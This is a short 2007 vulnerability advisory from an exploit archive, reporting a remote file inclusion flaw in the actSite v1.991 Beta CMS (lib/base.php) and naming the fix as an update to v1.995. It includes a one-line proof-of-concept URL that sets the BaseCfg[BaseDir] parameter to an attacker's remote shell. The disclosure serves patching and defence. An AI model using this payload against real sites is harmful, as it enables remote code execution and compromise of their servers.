Home / exploitsPDF  

actsitebase-rfi.txt

Posted on 02 October 2007

#'#/ (-.-) ---------------------oOO---(_)---OOo-------------------- | actSite v1.991 Beta (base.php) Remote File Inclusion | | coded by DNX | -------------------------------------------------------- [!] Discovered: DNX [!] Vendor: http://www.actsite.de [!] Detected: 02.09.2007 [!] Reported: 02.09.2007 [!] Remote: yes [!] Background: actSite is a content management system based on PHP and MySQL [!] Bug: $BaseCfg[BaseDir] in lib/base.php [!] PoC: - http://[site]/[path]/lib/base.php?BaseCfg[BaseDir]=[shell] [!] Solution: Install update to v1.995

 

TOP